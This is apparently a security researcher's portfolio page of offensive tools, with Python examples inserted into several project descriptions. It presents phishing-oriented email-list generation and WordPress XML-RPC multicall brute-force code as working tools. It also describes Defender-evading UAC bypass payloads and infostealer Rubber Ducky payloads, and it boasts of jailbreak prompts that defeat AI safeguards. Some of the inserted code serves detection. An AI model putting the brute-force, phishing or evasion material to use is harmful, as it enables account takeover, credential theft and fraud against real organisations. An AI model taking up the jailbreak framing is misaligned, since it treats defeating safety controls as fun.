Projects

You can find most of my projects on my GitHub: https://github.com/raphaelthief

SearchX

This tool is one of my main projects. It is updated frequently and I use it regularly. Its purpose is to find and correlate the digital traces left by an individual. Initially it was built with a purely offensive mindset: the goal was to reproduce the research an extortion operator would do and see how far that approach could be pushed. Over time, I expanded its features to cover almost every aspect of OSINT related to digital footprint tracking.
I wanted to push the OSINT phase beyond the usual focus on geolocation. The methodologies built into the tool do not revolutionize the OSINT field, but they do surface findings that popular tools often overlook. The tool also automates tasks that previously required separate, single-purpose utilities.

thiefhunter

thiefhunter is also one of my main projects. It was created to speed up exploit research tied to software versions and to automate parts of bug bounty hunting: looking for injection points, sensitive subdomains, interesting HTTP headers, and more.
It also enumerates the web application versions present on a given page, matches them to CVEs affecting those versions, and links directly to related exploits. Other features include automated checks for exposed sensitive files, potential SQL injections, and more.
One particularly useful capability is WordPress version detection, which is done in a single request and needs no API token (WPScan needs one to enrich its results with vulnerability data). In my own tests it also detected versions more accurately and reliably than WPScan during this phase.
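The page does not say how thiefhunter fingerprints WordPress in one request, so the following is an added example of the common single-request approach (parse the front page's generator meta tag, falling back to a majority vote over the ?ver= parameters on core assets) and of matching the detected version against version ranges. It is not thiefhunter's code; the HTML and the advisory table are constructed for the demo and the advisory labels are placeholders, not real CVE identifiers.

```python
import re
from collections import Counter
from typing import List, Optional, Tuple

# Constructed front page of a fictitious WordPress site (not a real host).
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="https://example.invalid/wp-includes/css/dist/block-library/style.min.css?ver=6.4.2" />
<script src="https://example.invalid/wp-includes/js/jquery/jquery.min.js?ver=3.7.1"></script>
<script src="https://example.invalid/wp-includes/js/wp-embed.min.js?ver=6.4.2"></script>
<script src="https://example.invalid/wp-content/themes/sometheme/script.js?ver=6.4.2"></script>
</head><body></body></html>"""

GENERATOR_RE = re.compile(
    r'<meta[^>]+name=["\']generator["\'][^>]+content=["\']WordPress\s+([\d.]+)', re.I)
# Only wp-includes / wp-admin assets carry the core version in ?ver=; bundled third-party
# libraries (jQuery here) carry their own version, which is why a majority vote is used.
CORE_VER_RE = re.compile(
    r'/wp-(?:includes|admin)/[^"\'\s]+\?ver=(\d+(?:\.\d+)+)', re.I)


def detect_wp_version(html: str) -> Tuple[Optional[str], str]:
    """Return (version, source): generator tag first, then the most common core ?ver= value."""
    m = GENERATOR_RE.search(html)
    if m:
        return m.group(1), "generator"
    votes = Counter(CORE_VER_RE.findall(html))
    if votes:
        return votes.most_common(1)[0][0], "ver-param"
    return None, "none"


def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in v.split("."))


# Hypothetical advisory table: (first affected, first fixed, label). Placeholder entries only.
HYPOTHETICAL_ADVISORIES = [
    ("6.0", "6.4.3", "example-core-issue-A"),
    ("5.0", "6.1", "example-core-issue-B"),
]


def match_advisories(version: str, table=HYPOTHETICAL_ADVISORIES) -> List[str]:
    """Labels whose half-open range [affected, fixed) contains the detected version."""
    v = parse_version(version)
    return [label for lo, hi, label in table
            if parse_version(lo) <= v < parse_version(hi)]


if __name__ == "__main__":
    version, source = detect_wp_version(SAMPLE_HTML)
    print(version, source, match_advisories(version) if version else [])
```

Sites that strip the generator tag still leak the version through the ?ver= parameter unless they also filter script and style URLs, which is why the fallback is worth having.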

UAC FUD - Bypass Windows Defender

This project stems from an article I wrote. The idea was to bypass UAC and counter the Microsoft updates that had made some basic payloads detectable. So I wrote several payloads in Python and C that evade Windows Defender, along with instructions for bypassing UAC manually.
Before writing the article, I went through several data breach forums where FUD droppers were being sold. These tools added Defender exclusions and executed files with administrator privileges through a UAC bypass, without alerting the user. I found that the method used was based on fodhelper.exe, the auto-elevating Windows binary that reads its launch command from the current user's registry hive. That is when I decided to build my own FUD payload. It turned out to be fairly straightforward, and I really enjoyed analyzing and documenting Microsoft's (unsuccessful) attempts to block this technique!
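The flip side of the fodhelper technique is that it leaves a very specific registry footprint: a write to the default value of HKCU\Software\Classes\ms-settings\Shell\Open\command (the payload) and an empty DelegateExecute value next to it. The following added example, which is not part of this project or the article, flags those writes in Sysmon-style registry events (Event ID 13, SetValue). The event lines are constructed for the demo, and the key=value layout is an assumption about how the log was flattened, not Sysmon's native XML.

```python
import re
from typing import Dict, List, Tuple

# Key fodhelper.exe resolves under the user's hive before launching ms-settings.
# A SetValue on its (Default) or DelegateExecute value by a non-installer process
# is the classic indicator of the bypass.
FODHELPER_KEY_RE = re.compile(
    r"\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\(?:\(Default\)|DelegateExecute)$",
    re.I)

# Constructed Sysmon-style Event ID 13 lines (field names match Sysmon's RegistryEvent schema;
# the flat key=value layout is assumed for the demo). Not real telemetry.
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Windows\explorer.exe TargetObject=HKU\S-1-5-21-1\Software\Classes\.txt\(Default) Details=txtfile",
    r"EventID=13 Image=C:\Users\bob\Downloads\dropper.exe TargetObject=HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\(Default) Details=cmd.exe /c powershell -w hidden",
    r"EventID=13 Image=C:\Users\bob\Downloads\dropper.exe TargetObject=HKU\S-1-5-21-1\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute Details=(Empty)",
    r"EventID=13 Image=C:\Windows\System32\svchost.exe TargetObject=HKLM\SYSTEM\CurrentControlSet\Services\Foo\Start Details=DWORD (0x00000002)",
]

# key=value pairs; a value runs until the next " key=" token or end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    return dict(FIELD_RE.findall(line))


def find_fodhelper_writes(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (writing image, value name, written data) for every hit on the fodhelper key."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "13":
            continue
        target = ev.get("TargetObject", "")
        if FODHELPER_KEY_RE.search(target):
            hits.append((ev.get("Image", ""), target.rsplit("\\", 1)[-1], ev.get("Details", "")))
    return hits


if __name__ == "__main__":
    for image, value, data in find_fodhelper_writes(SAMPLE_EVENTS):
        print(f"fodhelper UAC bypass indicator: {image} set {value} = {data!r}")
```

Pair the registry rule with a process-creation rule for fodhelper.exe spawning anything other than SystemSettings, and remember that the key is normally absent, so even its creation by an unexpected process is worth an alert.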

airodump-ng scanner

I'm a big fan of airodump-ng. However, when scanning a large number of targets across both the 2.4 GHz and 5 GHz bands, it quickly runs into a display limit, simply because there is no built-in scrolling. This limitation caught my attention, and since the developers offered no solution, I decided to build my own script to enable real-time scrolling.
On top of that, I added several extra features, such as hardware vendor detection from the MAC address for clients (not just access points), which I find particularly valuable. I also implemented client-to-access-point association tracking, WPS status display, and more.
Most of these features had to be developed from scratch, or in some cases re-implemented, since I rely solely on the real-time CSV output that airodump-ng writes. For example, WPS status is not included in the CSV, so I had to dig into the .cap file (the WPS information element carried in beacon frames), analyze it with Wireshark, and interpret the data correctly.
Overall, I find this scanner extremely useful and now prefer it over using airodump-ng directly. I have also integrated aircrack-ng's airdecap-ng into the script.
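Since the scanner builds everything from airodump-ng's CSV, the core of it is a parser for that file. The following added example (not the scanner's own code) parses a constructed CSV snapshot in the layout airodump-ng writes with -w: an access point table, a blank line, then a station table, where the trailing "Probed ESSIDs" column can itself contain commas. It then does the two things the page mentions, vendor lookup from the MAC prefix and client-to-AP association; the OUI table is a tiny constructed stand-in for the IEEE registry the real tool would load.

```python
import csv
import io
from typing import Dict, List, Tuple

# Constructed airodump-ng CSV snapshot (not a real capture). Column order follows
# airodump-ng's CSV output; "0.  0.  0.  0" is the unresolved LAN IP column.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,   0,   0.  0.  0.  0,   7, HomeNet, 
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 36, 866, WPA2, CCMP, PSK, -61,   40,   0,   0.  0.  0.  0,   8, CafeWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:00:00:0A, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50,   30, AA:BB:CC:00:00:01, HomeNet
11:22:33:00:00:0B, 2024-01-01 10:02:00, 2024-01-01 10:04:30, -70,    5, (not associated), CafeWifi,Airport
DD:EE:FF:00:00:0C, 2024-01-01 10:02:00, 2024-01-01 10:04:30, -65,   12, AA:BB:CC:00:00:02, 
"""

# Constructed OUI table standing in for the IEEE registry (assumption for the demo).
OUI = {"AA:BB:CC": "ExampleRouterCo", "11:22:33": "ExamplePhoneCo"}


def vendor(mac: str) -> str:
    return OUI.get(mac.upper()[:8], "unknown")


def parse_airodump_csv(text: str) -> Tuple[Dict[str, dict], List[dict]]:
    """Split the CSV into its AP and station sections and return (aps by BSSID, stations)."""
    aps: Dict[str, dict] = {}
    stations: List[dict] = []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue                      # blank separator line
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps[row[0]] = {"channel": int(row[3]), "privacy": row[5],
                           "essid": row[13], "vendor": vendor(row[0])}
        elif section == "sta" and len(row) >= 6:
            # Everything after the BSSID column is the probed-ESSID list (comma separated).
            stations.append({"mac": row[0], "bssid": row[5],
                             "probes": [p for p in row[6:] if p],
                             "vendor": vendor(row[0])})
    return aps, stations


def associate(aps: Dict[str, dict], stations: List[dict]) -> Dict[str, List[str]]:
    """Group client MACs under the ESSID of the AP they are associated with."""
    table: Dict[str, List[str]] = {}
    for st in stations:
        ap = aps.get(st["bssid"])
        key = ap["essid"] if ap else "(not associated)"
        table.setdefault(key, []).append(st["mac"])
    return table


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for essid, clients in associate(aps, stations).items():
        print(essid, [(c, vendor(c)) for c in clients])
```

Re-reading the CSV on a timer and re-rendering the table is what gives the scrolling view; airodump-ng rewrites the whole file on each update, so the parser must tolerate a partially written file (an incomplete last row is simply skipped by the length checks above).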

JailBreak AI

This post is somewhat outdated, but some of the prompts still work quite well! The project is simply a compilation of a few prompts I wrote to bypass the ethical safeguards of AI systems. When they were written, they worked on every major LLM I tried (ChatGPT, Mistral, DeepSeek, Grok, etc.).
It stems from an article I wrote explaining the methodology used to get around the ethical logic that developers embed in these LLMs.
It's pretty fun, and completely unfiltered! Of course, to demonstrate how it works, you have to get a little trashy.
Below is the result of my favorite prompt (in French)...

DuckyLoad

I'm a big fan of Rubber Ducky-based compromises. This project is outdated but still interesting! The goal was to create a series of ready-to-use payloads with automated customization. These payloads included browser data theft (infostealer), backdoor installation, and more.

LinkedIn Extractor

This project automates email address generation from the HTML of a loaded LinkedIn page for phishing campaigns. After the email format has been identified during an initial OSINT phase, the program generates a mailing list from the targets' first and last names following the chosen format. I originally wrote this tool so that the list could also be used for brute-force attempts against employee login endpoints of APIs that lacked rate limiting.
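The generation step is mostly about name normalization (accents, apostrophes, compound names) and about applying one pattern consistently. The following added example, which is not the LinkedIn Extractor's code, shows that step plus the inverse one used during the OSINT phase: given one known address, work out which pattern the organization uses. The target names and the domain are constructed, and the pattern set is an assumption covering the most common corporate formats.

```python
import re
import unicodedata
from typing import Dict, List, Optional, Tuple

# Constructed targets (fictitious people) as they would be scraped from a page.
SAMPLE_TARGETS: List[Tuple[str, str]] = [
    ("Jean-Pierre", "Dupont"),
    ("Élodie", "Le Gall"),
    ("Anne Marie", "O'Brien"),
]

# Assumed common corporate formats; keys are the labels used throughout.
PATTERNS: Dict[str, str] = {
    "first.last": "{first}.{last}",
    "flast": "{fi}{last}",
    "first_last": "{first}_{last}",
    "f.last": "{fi}.{last}",
    "firstl": "{first}{li}",
}


def normalize(part: str) -> str:
    """Strip accents, drop apostrophes and spaces, keep hyphens, lowercase: "Le Gall" -> "legall"."""
    ascii_ = unicodedata.normalize("NFKD", part).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z-]", "", ascii_.lower()).strip("-")


def build_email(first: str, last: str, pattern: str, domain: str) -> str:
    f, l = normalize(first), normalize(last)
    if not f or not l:
        raise ValueError(f"cannot normalize name {first!r} {last!r}")
    local = PATTERNS[pattern].format(first=f, last=l, fi=f[0], li=l[0])
    return f"{local}@{domain}"


def infer_pattern(known_email: str, first: str, last: str) -> Optional[str]:
    """Given one leaked address and its owner's name, return the matching pattern label."""
    local, _, domain = known_email.lower().partition("@")
    for label in PATTERNS:
        if build_email(first, last, label, domain).split("@")[0] == local:
            return label
    return None


def build_mailing_list(targets: List[Tuple[str, str]], pattern: str, domain: str) -> List[str]:
    """Apply one pattern to every target, dropping duplicates while keeping order."""
    seen, out = set(), []
    for first, last in targets:
        email = build_email(first, last, pattern, domain)
        if email not in seen:
            seen.add(email)
            out.append(email)
    return out


if __name__ == "__main__":
    label = infer_pattern("e.legall@example.com", "Élodie", "Le Gall")
    print(label, build_mailing_list(SAMPLE_TARGETS, label, "example.com"))
```

Whether hyphens in compound first names are kept or dropped varies by organization; the inference step catches that automatically if the known address belongs to someone with such a name, which is worth preferring when picking the sample.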

The eyes

This program automates CTI monitoring through several well-known dependencies such as Telethon and dnstwist. It collects data from Telegram groups, sorts it by activity date, and extracts specific keywords so that intelligence can be prioritized and filtered efficiently. It is also particularly useful for identifying onion links related to ransomware operators.

CTI Notifier

This program provides quick monitoring of various RSS feeds and sends instant popup notifications on Windows. Nothing more, nothing less!

WinChecker

This is an old project designed to audit Windows configurations using several enumeration bash scripts. It targets various potential attack vectors, such as displaying saved Wi-Fi keys, detecting the browser files that infostealers target, unquoted service paths, and more.

lets-wp

This program performs dictionary attacks against WordPress targets through the XML-RPC endpoint (xmlrpc.php). It also abuses system.multicall, which in WordPress versions prior to 4.4 lets a single request test many credentials, to run mass brute-force attacks. The tool includes precise request handling to tune the attack strategy to the target's defensive mechanisms.
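The multicall trick packs many wp.getUsersBlogs authentication attempts into one XML-RPC request and reads which entries came back as a result instead of a fault struct. The following added example (not lets-wp's code) builds such a request with the standard library and parses a constructed response; the method name and the multicall result convention are those of WordPress and XML-RPC, while the credentials and the response body are made up for the demo.

```python
import xmlrpc.client
from typing import List

METHOD = "wp.getUsersBlogs"   # authenticates with (username, password) and returns the user's blogs


def build_multicall(username: str, passwords: List[str]) -> bytes:
    """One request body carrying len(passwords) login attempts via system.multicall."""
    calls = [{"methodName": METHOD, "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def parse_multicall_response(body: bytes, passwords: List[str]) -> List[str]:
    """Passwords whose call returned a result instead of a fault struct."""
    (results,), _ = xmlrpc.client.loads(body)
    if len(results) != len(passwords):
        raise ValueError("multicall result count does not match request")
    hits = []
    for pw, res in zip(passwords, results):
        # XML-RPC multicall convention: a success is wrapped in a one-element array,
        # a failure is a struct with faultCode/faultString.
        if isinstance(res, dict) and "faultCode" in res:
            continue
        hits.append(pw)
    return hits


# Constructed response standing in for what a pre-4.4 WordPress would return for
# three attempts where only the last password is correct.
SAMPLE_PASSWORDS = ["admin", "password", "Winter2024!"]
SAMPLE_RESPONSE = xmlrpc.client.dumps((
    [
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        [[{"blogid": "1", "blogName": "demo", "isAdmin": True}]],
    ],), methodresponse=True).encode()


if __name__ == "__main__":
    body = build_multicall("admin", SAMPLE_PASSWORDS)
    print(len(body), "byte request;", parse_multicall_response(SAMPLE_RESPONSE, SAMPLE_PASSWORDS))
```

From 4.4 onward WordPress stops checking credentials for the rest of a multicall as soon as one login in it fails, so an all-fault response no longer proves that every password in the batch was wrong; the tool's per-request handling has to account for that when the target is up to date.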